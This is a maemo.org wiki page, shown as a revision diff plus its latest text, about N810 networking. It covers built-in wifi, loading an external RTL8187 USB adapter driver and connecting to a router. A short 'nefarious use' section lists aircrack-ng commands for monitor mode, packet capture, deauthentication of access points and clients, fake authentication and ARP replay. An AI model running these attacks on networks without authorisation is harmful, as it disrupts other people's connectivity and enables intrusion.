Networking
(Link to talk thread with the archive (not available anymore in the previous locations)) |
|||
(16 intermediate revisions not shown) | |||
Line 1: | Line 1: | ||
- | + | == Built-in wifi (Managed) == | |
- | + | The built-in wireless card is pictured in detail here: http://talk.maemo.org/showthread.php?t=30032 | |
- | + | This interface is wlan0 and uses the closed-source cx3110x driver. For the NITdroid project an open-source driver http://stlc45xx.garage.maemo.org was created. As it stands, the internal wifi chipset is not capable of injection with either of these drivers. | |
- | + | ||
- | + | A useful utility is [http://maemo.org/downloads/product/OS2008/wifiinfo WifiInfo] which shows signal strength, internal IP address, power savings toggle and a AP scan option. | |
- | + | ||
- | + | Some people have reported difficulty connecting to university wifi systems which use PEAP+MSCHAPv2 authentication. See the [[PEAP+MSCHAPv2 WiFi authentication setup]] page for how to resolve this issue. | |
- | + | ||
- | + | === ad hoc wifi === | |
- | + | {{main|N900 ad hoc wifi hotspot}} | |
== External USB wifi (r8187) == | == External USB wifi (r8187) == | ||
Line 21: | Line 18: | ||
The Alfa goes for about $35, while the knock-off is about $25. | The Alfa goes for about $35, while the knock-off is about $25. | ||
- | You are going to need more power than the N810 can provide for itself. There are many ways to do this. | + | You are going to need more power than the N810 can provide for itself. There are many ways to do this. [http://talk.maemo.org/showthread.php?t=31117] of power injection |
- | Download | + | Download the archive attached to [http://talk.maemo.org/showthread.php?t=30838 this post]. |
- | + | Untar it somewher (for example to Documents) | |
# cd /home/user/MyDocs/.documents/ | # cd /home/user/MyDocs/.documents/ | ||
# tar -xvf rtl8187_diablo.tar | # tar -xvf rtl8187_diablo.tar | ||
Line 33: | Line 30: | ||
Script: | Script: | ||
+ | <source lang="bash"> | ||
echo host > /sys/devices/platform/msusb_hdrc/mode | echo host > /sys/devices/platform/msusb_hdrc/mode | ||
insmod ieee80211_crypt-rtl.ko | insmod ieee80211_crypt-rtl.ko | ||
Line 38: | Line 36: | ||
insmod r8187.ko | insmod r8187.ko | ||
echo -n 1 > /sys/bus/usb/devices/1-1/bConfigurationValue | echo -n 1 > /sys/bus/usb/devices/1-1/bConfigurationValue | ||
+ | </source> | ||
The first line tells the N810 to set the USB mode as host | The first line tells the N810 to set the USB mode as host | ||
Line 96: | Line 95: | ||
which should point to your router's admin page (default gateway). | which should point to your router's admin page (default gateway). | ||
- | + | ===nefarious use=== | |
- | ===nefarious use | + | |
while on the subject, instead of connecting to router, let's change the mode from Managed to Monitor (injection-capable) | while on the subject, instead of connecting to router, let's change the mode from Managed to Monitor (injection-capable) | ||
Line 114: | Line 112: | ||
Deauthenticate attack. The X's are the BSSID of the Access Point/Router | Deauthenticate attack. The X's are the BSSID of the Access Point/Router | ||
- | # aireplay wlan1 -0 0 XX:XX:XX:XX:XX:XX | + | # aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX |
Deauthenticate user with the c parameter. | Deauthenticate user with the c parameter. | ||
- | # aireplay wlan1 -0 0 XX:XX:XX:XX:XX:XX | + | # aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX |
Fake authentication. | Fake authentication. | ||
- | # aireplay wlan1 -1 5 XX:XX:XX:XX:XX:XX | + | # aireplay wlan1 -1 5 -a XX:XX:XX:XX:XX:XX |
ARP attack. Takes awhile to start injecting packets. ARPs good, ACKs bad. | ARP attack. Takes awhile to start injecting packets. ARPs good, ACKs bad. | ||
- | # aireplay wlan1 -3 XX:XX:XX:XX:XX:XX | + | # aireplay wlan1 -3 -b XX:XX:XX:XX:XX:XX |
== Ethernet == | == Ethernet == | ||
- | |||
- | + | {{main|USB to ethernet networking}} | |
- | + | ||
- | + | ||
- | + | == Bluetooth DUN == | |
+ | |||
+ | {{main|Bluetooth DUN}} | ||
== Bluetooth PAN == | == Bluetooth PAN == | ||
- | |||
- | |||
- | + | {{main|Bluetooth PAN}} | |
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
- | + | ||
== USB networking == | == USB networking == | ||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
- | |||
+ | {{main|USB networking}} | ||
- | + | [[Category:Power users]] | |
- | + | [[Category:Connectivity]] | |
- | + | ||
- | [[Category: | + |
Latest revision as of 17:13, 15 June 2011
Contents |
[edit] Built-in wifi (Managed)
The built-in wireless card is pictured in detail here: http://talk.maemo.org/showthread.php?t=30032
This interface is wlan0 and uses the closed-source cx3110x driver. For the NITdroid project an open-source driver http://stlc45xx.garage.maemo.org was created. As it stands, the internal wifi chipset is not capable of injection with either of these drivers.
A useful utility is WifiInfo which shows signal strength, internal IP address, power savings toggle and a AP scan option.
Some people have reported difficulty connecting to university wifi systems which use PEAP+MSCHAPv2 authentication. See the PEAP+MSCHAPv2 WiFi authentication setup page for how to resolve this issue.
[edit] ad hoc wifi
Main article: N900 ad hoc wifi hotspot
[edit] External USB wifi (r8187)
This is the legacy drive for the RTL8187 chipset. The Alfa 500mW b/g usb adapter uses this as do knock-offs. The Alfa goes for about $35, while the knock-off is about $25.
You are going to need more power than the N810 can provide for itself. There are many ways to do this. [1] of power injection
Download the archive attached to this post. Untar it somewher (for example to Documents)
# cd /home/user/MyDocs/.documents/ # tar -xvf rtl8187_diablo.tar # cd rtl8187/
Make script executable
# chmod a+x r8187-start
Script:
echo host > /sys/devices/platform/msusb_hdrc/mode insmod ieee80211_crypt-rtl.ko insmod ieee80211-rtl.ko insmod r8187.ko echo -n 1 > /sys/bus/usb/devices/1-1/bConfigurationValue
The first line tells the N810 to set the USB mode as host The next 3 lines insert the kernel modules in the right order. The last line is optional, if you have a proper powered hub comment it out, if you are using a y-cable or similar then this tells the N810 to ignore the lack of power messages and use the device anyway. No, this will not work if you do not have the full power requirements; it is merely for when you fulfill the power requirement and the device does not know it.
Plug the microusb end into your N810. A couple error message will pop up, these are normal and just ignore them."usb device not supported". then "Unable to connect, no file system available" (hit OK)
# lsusb (as root, else there will be no output) Bus 001 Device 012: ID 0bda:8187 Realtek Semiconductor Corp. Bus 001 Device 001: ID 0000:0000
if no output then you are not root. If the Realtek doesn't show up then try lsusb a few more times, if that doesn't work it means that the wifi card is not being supplied enough power. That is the tricky part regarding external (also card chipset must be supported) usb wifi cards.
Now time to execute the script
$ ./r8187-start
No output should show (if you run this too early, as in before the popup error messages then it might also have no output). If you have already run this script this session (haven't turned off N810 since) then it will state that it can't insert the kernel modules. If it states that "/sys/bus/usb/devices/1-1/bConfigurationValue" does not exist, it means it is not getting enough power. It might also state that if you have not plugged the cable in.
At this point let's see if everything works.
# bash # airmon-ng Interface Chipset Driver wlan0 Nokia 770 cx3110x wlan1 RTL8187 r8187
# airodump-ng wlan1
At this point we are not using aircrack-ng suite for nefarious use. We are using it because it's reliable and the built-in (and community created) tools are hard-coded for wlan0. A list of APs/routers should appear as it sees them. We are doing this in leu of a proper scanner (Connections and WifiInfo are hard-coded and iwlist scan wlan1 doesn't work for some reason)
[edit] connect to router
connect to AP/router
# iwconfig wlan1 essid MYNETWORKHERE
input key to open AP
# iwconfig wlan1 key off
check to see if associated with AP
# iwconfig wlan1
obtain IP address via DHCP (if obtaining leave fails, just run command again until it succeeds)
# /sbin/udhcpc -n -q -i wlan1
select DUMMY from Network connection dialog box and browse the web!
If browsing doesn't work, then check if you can ping IP
ping 4.2.2.2
If that works but ping google.com doesn't then DNS isn't working
nano /etc/resolv.conf
And make sure a line like this exists:
NAMESERVER 192.168.1.1
which should point to your router's admin page (default gateway).
[edit] nefarious use
while on the subject, instead of connecting to router, let's change the mode from Managed to Monitor (injection-capable)
# airmon start wlan1
Now run airodump to capture packets
# airodump-ng wlan1 -w savedfile
Choose a channel to increased efficiency
# airodump-ng wlan1 -w savedfile -c 6
Open a new terminal window or tab to run some attacks while airodump is running. First we test if injection is working. Not all routers are suseptable to packet injection, range is also a major factor. If at least one router gets over 0% then injection is in fact working correctly.
# aireplay wlan1 -9
Deauthenticate attack. The X's are the BSSID of the Access Point/Router
# aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX
Deauthenticate user with the c parameter.
# aireplay wlan1 -0 0 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX
Fake authentication.
# aireplay wlan1 -1 5 -a XX:XX:XX:XX:XX:XX
ARP attack. Takes awhile to start injecting packets. ARPs good, ACKs bad.
# aireplay wlan1 -3 -b XX:XX:XX:XX:XX:XX
[edit] Ethernet
Main article: USB to ethernet networking
[edit] Bluetooth DUN
Main article: Bluetooth DUN
[edit] Bluetooth PAN
Main article: Bluetooth PAN
[edit] USB networking
Main article: USB networking
- This page was last modified on 15 June 2011, at 17:13.
- This page has been accessed 36,055 times.